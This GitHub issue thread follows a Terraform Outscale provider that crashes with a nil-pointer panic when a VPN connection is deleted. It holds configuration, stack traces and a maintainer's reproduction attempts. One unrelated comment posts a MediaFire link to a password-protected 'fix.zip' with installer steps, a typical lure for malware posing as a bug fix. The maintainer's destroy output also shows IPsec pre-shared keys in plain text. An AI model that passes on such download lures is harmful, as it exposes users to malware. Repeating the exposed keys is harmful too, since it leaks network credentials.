### ISSUE TITLE
 Bug with the vpn connection 

### ISSUE THREAD

**Issue by naicoram01** [outscale/terraform-provider-outscale#468]
Hi,

I have this error when trying to create a vpn connection.

The VPN connection will create :
- New Client GW
- VPN connection based on a Virtual GW used already with another Client GW
- 
for information below the terraform configuration 
:
// ###===VPN SECOURS====###
resource "outscale_client_gateway" "CGW_Celeste-NET-TEST" {
bgp_asn = 2551
public_ip = "82.210.16.178"
connection_type = "ipsec.1"
tags {
key = "Name"
value = "CGW_Celeste-NET-TEST"
}
}

resource "outscale_vpn_connection" "VPN_Secours-NET-TEST" {
client_gateway_id = outscale_client_gateway.CGW_Celeste-NET-TEST.client_gateway_id
virtual_gateway_id = outscale_virtual_gateway.VGW-NET-TEST.virtual_gateway_id
connection_type = "ipsec.1"
static_routes_only = true
tags {
key = "Name"
value = "VPN-CLG2-Celeste-TO-NET-TEST"
}
depends_on = [outscale_client_gateway.CGW_Celeste-NET-TEST, outscale_virtual_gateway.VGW-NET-TEST]
}

resource "outscale_vpn_connection_route" "VPN_Secours-ROUTE-NET-TEST" {
vpn_connection_id = outscale_vpn_connection.VPN_Secours-NET-TEST.vpn_connection_id
destination_ip_range = "10.0.0.0/8"
depends_on = [ outscale_vpn_connection.VPN_Secours-NET-TEST ]

}

resource "outscale_vpn_connection_route" "VPN_Secours-ROUTE-NET-TEST_192" {
vpn_connection_id = outscale_vpn_connection.VPN_Secours-NET-TEST.vpn_connection_id
destination_ip_range = "192.168.0.0/16"
depends_on = [ outscale_vpn_connection.VPN_Secours-NET-TEST ]

}

Could you please help ?

Thank you so much

│ Error: Plugin did not respond
│
│ with outscale_vpn_connection.VPN_Secours-NET-TEST,
│ on vpn-net-test.tf line 78, in resource "outscale_vpn_connection" "VPN_Secours-NET-TEST":
│ 78: resource "outscale_vpn_connection" "VPN_Secours-NET-TEST" {
│
│ The plugin encountered an error, and failed to respond to the plugin.(*GRPCProvider).ApplyResourceChange call. The plugin logs may contain more details.
╵

Stack trace from the terraform-provider-outscale_v0.10.1 plugin:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x10 pc=0x111922f]

goroutine 85 [running]:
github.com/terraform-providers/terraform-provider-outscale/outscale.vpnConnectionRefreshFunc.func1()
/src/github.com/terraform-providers/terraform-provider-outscale/outscale/resource_outscale_vpn_connection.go:277 +0x16f
github.com/hashicorp/terraform-plugin-sdk/helper/resource.(*StateChangeConf).WaitForState.func1()
/root/go/pkg/mod/github.com/hashicorp/terraform-plugin-sdk@v1.17.2/helper/resource/state.go:103 +0x186
created by github.com/hashicorp/terraform-plugin-sdk/helper/resource.(*StateChangeConf).WaitForState
/root/go/pkg/mod/github.com/hashicorp/terraform-plugin-sdk@v1.17.2/helper/resource/state.go:80 +0x1b8

Error: The terraform-provider-outscale_v0.10.1 plugin crashed!

This is always indicative of a bug within the plugin. It would be immensely
helpful if you could report the crash with the plugin's maintainers so that it
can be fixed. The output above should help diagnose the issue.

**Comment by outscale-toa** [comment]
Hi @naicoram01,
 
Thanks for reaching us, we are looking at your issue.

Best regards,

**Comment by naicoram01** [comment]
even when I updated the provider I always have the same error :

╷
│ Error: Plugin did not respond
│
│ The plugin encountered an error, and failed to respond to the plugin.(*GRPCProvider).ApplyResourceChange call. The plugin logs may contain more details.
╵

Stack trace from the terraform-provider-outscale_v1.0.0 plugin:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x10 pc=0xffa369]

goroutine 56 [running]:
github.com/outscale/terraform-provider-outscale/outscale.ResourceOutscaleVPNConnectionDelete.vpnConnectionRefreshFunc.func2()
        github.com/outscale/terraform-provider-outscale/outscale/resource_outscale_vpn_connection.go:276 +0x149
github.com/hashicorp/terraform-plugin-sdk/v2/helper/retry.(*StateChangeConf).WaitForStateContext.func1()
        github.com/hashicorp/terraform-plugin-sdk/v2@v2.29.0/helper/retry/state.go:113 +0x1b0
created by github.com/hashicorp/terraform-plugin-sdk/v2/helper/retry.(*StateChangeConf).WaitForStateContext in goroutine 82
        github.com/hashicorp/terraform-plugin-sdk/v2@v2.29.0/helper/retry/state.go:86 +0x23b

Error: The terraform-provider-outscale_v1.0.0 plugin crashed!

This is always indicative of a bug within the plugin. It would be immensely
helpful if you could report the crash with the plugin's maintainers so that it
can be fixed. The output above should help diagnose the issue.
======================================================

thank you for your help

**Comment by outscale-toa** [comment]
Hi @naicoram01 
I can't reproduce your error, it looks like you are using unofficial ```terraform-provider-outscale_v0.10.1 ```.
Il try your configuration with ```v0.10.0```  and ```v0.11.0``` it works.
```hcl
resource "outscale_client_gateway" "CGW_Celeste-NET-TEST" {
  bgp_asn         = 2551
  public_ip       = "82.210.16.178"
  connection_type = "ipsec.1"
  tags {
    key   = "Name"
    value = "CGW_Celeste-NET-TEST"
  }
}
resource "outscale_virtual_gateway" "VGW-NET-TEST" {
  connection_type = "ipsec.1"
}

resource "outscale_vpn_connection" "VPN_Secours-NET-TEST" {
  client_gateway_id  = outscale_client_gateway.CGW_Celeste-NET-TEST.client_gateway_id
  virtual_gateway_id = outscale_virtual_gateway.VGW-NET-TEST.virtual_gateway_id
  connection_type    = "ipsec.1"
  static_routes_only = true
  tags {
    key   = "Name"
    value = "VPN-CLG2-Celeste-TO-NET-TEST"
  }
  depends_on = [outscale_client_gateway.CGW_Celeste-NET-TEST, outscale_virtual_gateway.VGW-NET-TEST]
}

resource "outscale_vpn_connection_route" "VPN_Secours-ROUTE-NET-TEST" {
  vpn_connection_id    = outscale_vpn_connection.VPN_Secours-NET-TEST.vpn_connection_id
  destination_ip_range = "10.0.0.0/8"
  depends_on           = [outscale_vpn_connection.VPN_Secours-NET-TEST]

}

resource "outscale_vpn_connection_route" "VPN_Secours-ROUTE-NET-TEST_192" {
  vpn_connection_id    = outscale_vpn_connection.VPN_Secours-NET-TEST.vpn_connection_id
  destination_ip_range = "192.168.0.0/16"
  depends_on           = [outscale_vpn_connection.VPN_Secours-NET-TEST]

}
``` 
 ``` terraform-provider-outscale_v1.0.0 ``` doesn't exist yet, we have ```v1.0.0-rc.1```

Best regards,

**Comment by naicoram01** [comment]
Hi outscale-toa,

Thank you for your support.
I upgraded the version of the provider and had the same error.

for information, the error is generated when I delete the section vpn_connection and the 2 routes after they ared created.

thank you

**Comment by naicoram01** [comment]
[svc_terraform_net@frparadm73 vpn-cnx]$     terraform apply "main.tfplan"
outscale_vpn_connection_route.VPN-ROUTE-NET-TEST_192: Destroying... [id=192.168.0.0/16:vpn-f8d81b90]
outscale_vpn_connection_route.VPN-ROUTE-NET-TEST: Destroying... [id=10.0.0.0/8:vpn-f8d81b90]
outscale_vpn_connection_route.VPN-ROUTE-NET-TEST: Destruction complete after 6s
outscale_vpn_connection_route.VPN-ROUTE-NET-TEST_192: Destruction complete after 6s
outscale_vpn_connection.VPN-NET-TEST: Destroying... [id=vpn-f8d81b90]
╷
│ Error: Plugin did not respond
│
│ The plugin encountered an error, and failed to respond to the plugin.(*GRPCProvider).ApplyResourceChange call. The plugin logs may contain more details.
╵

Stack trace from the terraform-provider-outscale_v1.0.0 plugin:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x10 pc=0xffa369]

goroutine 46 [running]:
github.com/outscale/terraform-provider-outscale/outscale.ResourceOutscaleVPNConnectionDelete.vpnConnectionRefreshFunc.func2()
        github.com/outscale/terraform-provider-outscale/outscale/resource_outscale_vpn_connection.go:276 +0x149
github.com/hashicorp/terraform-plugin-sdk/v2/helper/retry.(*StateChangeConf).WaitForStateContext.func1()
        github.com/hashicorp/terraform-plugin-sdk/v2@v2.29.0/helper/retry/state.go:113 +0x1b0
created by github.com/hashicorp/terraform-plugin-sdk/v2/helper/retry.(*StateChangeConf).WaitForStateContext in goroutine 75
        github.com/hashicorp/terraform-plugin-sdk/v2@v2.29.0/helper/retry/state.go:86 +0x23b

Error: The terraform-provider-outscale_v1.0.0 plugin crashed!

This is always indicative of a bug within the plugin. It would be immensely
helpful if you could report the crash with the plugin's maintainers so that it
can be fixed. The output above should help diagnose the issue.

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by outscale-toa** [comment]
I will try on Windows, and came back to you. 

Best regards,

**Comment by outscale-toa** [comment]
Hi @naicoram01,
I tried the terrafrom ``` v0.10.0 ``` plugin on ``` Windows 10 ``` and it works.

``` hcl
terraform {
  required_providers {
    outscale = {
      source  = "outscale/outscale"
      version = "0.10.0"
    }
  }
}
provider "outscale" {
  access_key_id = "XXXXXXXXXX"
  secret_key_id = "XXXXXXXXXX"
  region        = "eu-west-2"
}
resource "outscale_client_gateway" "CGW_Celeste-NET-TEST" {
  bgp_asn         = 2551
  public_ip       = "82.210.16.178"
  connection_type = "ipsec.1"
  tags {
    key   = "Name"
    value = "CGW_Celeste-NET-TEST"
  }
}
resource "outscale_virtual_gateway" "VGW-NET-TEST" {
  connection_type = "ipsec.1"
}

resource "outscale_vpn_connection" "VPN_Secours-NET-TEST" {
  client_gateway_id  = outscale_client_gateway.CGW_Celeste-NET-TEST.client_gateway_id
  virtual_gateway_id = outscale_virtual_gateway.VGW-NET-TEST.virtual_gateway_id
  connection_type    = "ipsec.1"
  static_routes_only = true
  tags {
    key   = "Name"
    value = "VPN-CLG2-Celeste-TO-NET-TEST"
  }
  depends_on = [outscale_client_gateway.CGW_Celeste-NET-TEST, outscale_virtual_gateway.VGW-NET-TEST]
}

resource "outscale_vpn_connection_route" "VPN_Secours-ROUTE-NET-TEST" {
  vpn_connection_id    = outscale_vpn_connection.VPN_Secours-NET-TEST.vpn_connection_id
  destination_ip_range = "10.0.0.0/8"
  depends_on           = [outscale_vpn_connection.VPN_Secours-NET-TEST]

}

resource "outscale_vpn_connection_route" "VPN_Secours-ROUTE-NET-TEST_192" {
  vpn_connection_id    = outscale_vpn_connection.VPN_Secours-NET-TEST.vpn_connection_id
  destination_ip_range = "192.168.0.0/16"
  depends_on           = [outscale_vpn_connection.VPN_Secours-NET-TEST]

}
```
And the ``` terraform.exe destroy``` works  
destroy output: 
```hcl
PS C:\Users\Lenovo\TEST_TF> terraform.exe destroy
outscale_client_gateway.CGW_Celeste-NET-TEST: Refreshing state... [id=cgw-642e96c7]
outscale_virtual_gateway.VGW-NET-TEST: Refreshing state... [id=vgw-ccb651c4]
outscale_vpn_connection.VPN_Secours-NET-TEST: Refreshing state... [id=vpn-db210d13]
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST_192: Refreshing state... [id=192.168.0.0/16:vpn-db210d13]
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST: Refreshing state... [id=10.0.0.0/8:vpn-db210d13]

Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the
following symbols:
  - destroy

Terraform will perform the following actions:

  # outscale_client_gateway.CGW_Celeste-NET-TEST will be destroyed
  - resource "outscale_client_gateway" "CGW_Celeste-NET-TEST" {
      - bgp_asn           = 2551 -> null
      - client_gateway_id = "cgw-642e96c7" -> null
      - connection_type   = "ipsec.1" -> null
      - id                = "cgw-642e96c7" -> null
      - public_ip         = "82.210.16.178" -> null
      - state             = "available" -> null

      - tags {
          - key   = "Name" -> null
          - value = "CGW_Celeste-NET-TEST" -> null
        }
    }

  # outscale_virtual_gateway.VGW-NET-TEST will be destroyed
  - resource "outscale_virtual_gateway" "VGW-NET-TEST" {
      - connection_type    = "ipsec.1" -> null
      - id                 = "vgw-ccb651c4" -> null
      - state              = "available" -> null
      - virtual_gateway_id = "vgw-ccb651c4" -> null
    }
    
  # outscale_vpn_connection.VPN_Secours-NET-TEST will be destroyed
  - resource "outscale_vpn_connection" "VPN_Secours-NET-TEST" {
      - client_gateway_configuration = jsonencode(
            {
              - ClientGatewayId  = "cgw-642e96c7"
              - ConnectionType   = "ipsec.1"
              - Tunnels          = [
                  - {
                      - ClientGateway  = {
                          - TunnelInside  = {
                              - IpRange = "169.254.254.2/30"
                            }
                          - TunnelOutside = {
                              - IpAddress = "82.210.16.178"
                            }
                        }
                      - Ike            = {
                          - AuthenticationProtocole    = "SHA2_256_128 HMAC"
                          - EncryptionProtocol         = "256-bit AES-CBC"
                          - Lifetime                   = 28800
                          - Mode                       = "main"
                          - PerfectForwardSecrecyGroup = 16
                          - PreSharedKey               = "uSAkteQgEswF7rMiwvugFDAjRR"
                        }
                      - Ipsec          = {
                          - AuthenticationProtocol        = "SHA2_256_128 HMAC"
                          - ClearDfBit                    = true
                          - DeadPeerDetection             = {
                              - Interval = 30
                              - Retries  = 3
                            }
                          - EncryptionProtocol            = "256-bit AES-CBC"
                          - FragmentationBeforeEncryption = true
                          - Lifetime                      = 3600
                          - Mode                          = "tunnel"
                          - PerfectForwardSecercyGroup    = 16
                          - Protocol                      = "esp"
                          - TcpMssAdjustment              = 1387
                        }
                      - VirtualGateway = {
                          - TunnelInside  = {
                              - IpRange = "169.254.254.1/30"
                            }
                          - TunnelOutside = {
                              - IpAddress = "142.44.56.25"
                            }
                        }
                    },
                ]
              - VirtualGatewayId = "vgw-ccb651c4"
            }
        ) -> null
      - client_gateway_id            = "cgw-642e96c7" -> null
      - connection_type              = "ipsec.1" -> null
      - id                           = "vpn-db210d13" -> null
      - routes                       = [
          - {
              - destination_ip_range = "10.0.0.0/8"
              - route_type           = "static"
              - state                = "available"
            },
          - {
              - destination_ip_range = "192.168.0.0/16"
              - route_type           = "static"
              - state                = "available"
            },
        ] -> null
      - state                        = "available" -> null
      - static_routes_only           = true -> null
      - vgw_telemetries              = [
          - {
              - accepted_route_count   = 0
              - last_state_change_date = "2024-08-29T09:54:25.145Z"
              - outside_ip_address     = "142.44.56.25"
              - state                  = "DOWN"
              - state_description      = "IPSEC IS DOWN"
            },
        ] -> null
      - virtual_gateway_id           = "vgw-ccb651c4" -> null
      - vpn_connection_id            = "vpn-db210d13" -> null

      - tags {
          - key   = "Name" -> null
          - value = "VPN-CLG2-Celeste-TO-NET-TEST" -> null
        }
    }

  # outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST will be destroyed
  - resource "outscale_vpn_connection_route" "VPN_Secours-ROUTE-NET-TEST" {
      - destination_ip_range = "10.0.0.0/8" -> null
      - id                   = "10.0.0.0/8:vpn-db210d13" -> null
      - vpn_connection_id    = "vpn-db210d13" -> null
    }

  # outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST_192 will be destroyed
  - resource "outscale_vpn_connection_route" "VPN_Secours-ROUTE-NET-TEST_192" {
      - destination_ip_range = "192.168.0.0/16" -> null
      - id                   = "192.168.0.0/16:vpn-db210d13" -> null
      - vpn_connection_id    = "vpn-db210d13" -> null
    }

Plan: 0 to add, 0 to change, 5 to destroy.

Do you really want to destroy all resources?
  Terraform will destroy all your managed infrastructure, as shown above.
  There is no undo. Only 'yes' will be accepted to confirm.

  Enter a value: yes

outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST_192: Destroying... [id=192.168.0.0/16:vpn-db210d13]
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST: Destroying... [id=10.0.0.0/8:vpn-db210d13]
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST_192: Destruction complete after 10s
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST: Still destroying... [id=10.0.0.0/8:vpn-db210d13, 10s elapsed]
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST: Destruction complete after 13s
outscale_vpn_connection.VPN_Secours-NET-TEST: Destroying... [id=vpn-db210d13]
outscale_vpn_connection.VPN_Secours-NET-TEST: Destruction complete after 9s
outscale_virtual_gateway.VGW-NET-TEST: Destroying... [id=vgw-ccb651c4]
outscale_client_gateway.CGW_Celeste-NET-TEST: Destroying... [id=cgw-642e96c7]
outscale_virtual_gateway.VGW-NET-TEST: Destruction complete after 1s
outscale_client_gateway.CGW_Celeste-NET-TEST: Destruction complete after 5s

Destroy complete! Resources: 5 destroyed.
```
If you have a particular OS configuration, I recommend contacting outscale support.

Best regards,

**Comment by naicoram01** [comment]
Hi,

We always have the same problem below the error generated after we want to delete the vpn connection  👍 

│ Error: Plugin did not respond
│
│ The plugin encountered an error, and failed to respond to the plugin.(*GRPCProvider).ApplyResourceChange call. The plugin logs may contain more details.
╵

Stack trace from the terraform-provider-outscale_v1.0.0 plugin:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x10 pc=0xffa369]

goroutine 69 [running]:
github.com/outscale/terraform-provider-outscale/outscale.ResourceOutscaleVPNConnectionDelete.vpnConnectionRefreshFunc.func2()
        github.com/outscale/terraform-provider-outscale/outscale/resource_outscale_vpn_connection.go:276 +0x149
github.com/hashicorp/terraform-plugin-sdk/v2/helper/retry.(*StateChangeConf).WaitForStateContext.func1()
        github.com/hashicorp/terraform-plugin-sdk/v2@v2.29.0/helper/retry/state.go:113 +0x1b0
created by github.com/hashicorp/terraform-plugin-sdk/v2/helper/retry.(*StateChangeConf).WaitForStateContext in goroutine 84
        github.com/hashicorp/terraform-plugin-sdk/v2@v2.29.0/helper/retry/state.go:86 +0x23b

Error: The terraform-provider-outscale_v1.0.0 plugin crashed!

we can see that in the end of the error 

for information, we are using the terraform on RHEL

thank you for your

**Comment by outscale-toa** [comment]
Hi @naicoram01,

I will test and came back to you.

Best regards,

**Comment by outscale-toa** [comment]
Hi @naicoram01,
I tested on 
```sh
[outscale@ip-10-9-33-24 TF_test]$ hostnamectl
   ....
  Operating System: Red Hat Enterprise Linux 8.4 (Ootpa)
       CPE OS Name: cpe:/o:redhat:enterprise_linux:8.4:GA
            Kernel: Linux 4.18.0-305.el8.x86_64
      Architecture: x86-64
```

tf_conf:
```hcl
[outscale@ip-10-9-33-24 TF_test]$ TF_LOG=TRACE terraform destroy
outscale_virtual_gateway.VGW-NET-TEST: Refreshing state... [id=vgw-5014669f]
outscale_client_gateway.CGW_Celeste-NET-TEST: Refreshing state... [id=cgw-9710c72e]
outscale_vpn_connection.VPN_Secours-NET-TEST: Refreshing state... [id=vpn-d1c3a01a]
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST: Refreshing state... [id=10.0.0.0/8:vpn-d1c3a01a]
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST_192: Refreshing state... [id=192.168.0.0/16:vpn-d1c3a01a]

Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols:
  - destroy

Terraform will perform the following actions:

  # outscale_client_gateway.CGW_Celeste-NET-TEST will be destroyed
  - resource "outscale_client_gateway" "CGW_Celeste-NET-TEST" {
      - bgp_asn           = 2551 -> null
      - client_gateway_id = "cgw-9710c72e" -> null
      - connection_type   = "ipsec.1" -> null
      - id                = "cgw-9710c72e" -> null
      - public_ip         = "82.210.16.178" -> null
      - state             = "available" -> null

      - tags {
          - key   = "Name" -> null
          - value = "CGW_Celeste-NET-TEST" -> null
        }
    }

  # outscale_virtual_gateway.VGW-NET-TEST will be destroyed
  - resource "outscale_virtual_gateway" "VGW-NET-TEST" {
      - connection_type    = "ipsec.1" -> null
      - id                 = "vgw-5014669f" -> null
      - state              = "available" -> null
      - virtual_gateway_id = "vgw-5014669f" -> null
    }

  # outscale_vpn_connection.VPN_Secours-NET-TEST will be destroyed
  - resource "outscale_vpn_connection" "VPN_Secours-NET-TEST" {
      - client_gateway_configuration = jsonencode(
            {
              - ClientGatewayId  = "cgw-9710c72e"
              - ConnectionType   = "ipsec.1"
              - Tunnels          = [
                  - {
                      - ClientGateway  = {
                          - TunnelInside  = {
                              - IpRange = "169.254.254.2/30"
                            }
                          - TunnelOutside = {
                              - IpAddress = "82.210.16.178"
                            }
                        }
                      - Ike            = {
                          - AuthenticationProtocole    = "SHA2_256_128 HMAC"
                          - EncryptionProtocol         = "256-bit AES-CBC"
                          - Lifetime                   = 28800
                          - Mode                       = "main"
                          - PerfectForwardSecrecyGroup = 16
                          - PreSharedKey               = "mvkPYbIjZE7kmpNlGjRRNW0ygb"
                        }
                      - Ipsec          = {
                          - AuthenticationProtocol        = "SHA2_256_128 HMAC"
                          - ClearDfBit                    = true
                          - DeadPeerDetection             = {
                              - Interval = 30
                              - Retries  = 3
                            }
                          - EncryptionProtocol            = "256-bit AES-CBC"
                          - FragmentationBeforeEncryption = true
                          - Lifetime                      = 3600
                          - Mode                          = "tunnel"
                          - PerfectForwardSecercyGroup    = 16
                          - Protocol                      = "esp"
                          - TcpMssAdjustment              = 1387
                        }
                      - VirtualGateway = {
                          - TunnelInside  = {
                              - IpRange = "169.254.254.1/30"
                            }
                          - TunnelOutside = {
                              - IpAddress = "142.44.57.83"
                            }
                        }
                    },
                ]
              - VirtualGatewayId = "vgw-5014669f"
            }
        ) -> null
      - client_gateway_id            = "cgw-9710c72e" -> null
      - connection_type              = "ipsec.1" -> null
      - id                           = "vpn-d1c3a01a" -> null
      - routes                       = [
          - {
              - destination_ip_range = "192.168.0.0/16"
              - route_type           = "static"
              - state                = "available"
            },
          - {
              - destination_ip_range = "10.0.0.0/8"
              - route_type           = "static"
              - state                = "available"
            },
        ] -> null
      - state                        = "available" -> null
      - static_routes_only           = true -> null
      - vgw_telemetries              = [
          - {
              - accepted_route_count   = 0
              - last_state_change_date = "2024-09-04T13:33:11.236Z"
              - outside_ip_address     = "142.44.57.83"
              - state                  = "DOWN"
              - state_description      = "IPSEC IS DOWN"
            },
        ] -> null
      - virtual_gateway_id           = "vgw-5014669f" -> null
      - vpn_connection_id            = "vpn-d1c3a01a" -> null

      - tags {
          - key   = "Name" -> null
          - value = "VPN-CLG2-Celeste-TO-NET-TEST" -> null
        }
    }

  # outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST will be destroyed
  - resource "outscale_vpn_connection_route" "VPN_Secours-ROUTE-NET-TEST" {
      - destination_ip_range = "10.0.0.0/8" -> null
      - id                   = "10.0.0.0/8:vpn-d1c3a01a" -> null
      - vpn_connection_id    = "vpn-d1c3a01a" -> null
    }

  # outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST_192 will be destroyed
  - resource "outscale_vpn_connection_route" "VPN_Secours-ROUTE-NET-TEST_192" {
      - destination_ip_range = "192.168.0.0/16" -> null
      - id                   = "192.168.0.0/16:vpn-d1c3a01a" -> null
      - vpn_connection_id    = "vpn-d1c3a01a" -> null
    }

Plan: 0 to add, 0 to change, 5 to destroy.

Do you really want to destroy all resources?
  Terraform will destroy all your managed infrastructure, as shown above.
  There is no undo. Only 'yes' will be accepted to confirm.

  Enter a value: yes

outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST: Destroying... [id=10.0.0.0/8:vpn-d1c3a01a]
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST_192: Destroying... [id=192.168.0.0/16:vpn-d1c3a01a]
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST_192: Destruction complete after 8s
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST: Still destroying... [id=10.0.0.0/8:vpn-d1c3a01a, 10s elapsed]
outscale_vpn_connection_route.VPN_Secours-ROUTE-NET-TEST: Destruction complete after 10s
outscale_vpn_connection.VPN_Secours-NET-TEST: Destroying... [id=vpn-d1c3a01a]
outscale_vpn_connection.VPN_Secours-NET-TEST: Destruction complete after 7s
outscale_client_gateway.CGW_Celeste-NET-TEST: Destroying... [id=cgw-9710c72e]
outscale_virtual_gateway.VGW-NET-TEST: Destroying... [id=vgw-5014669f]
outscale_virtual_gateway.VGW-NET-TEST: Destruction complete after 1s
outscale_client_gateway.CGW_Celeste-NET-TEST: Destruction complete after 6s

Destroy complete! Resources: 5 destroyed.

```
I'm going to do a PR to check ``` httpResponse ```  maybe it will fix your error.

Best Regard,
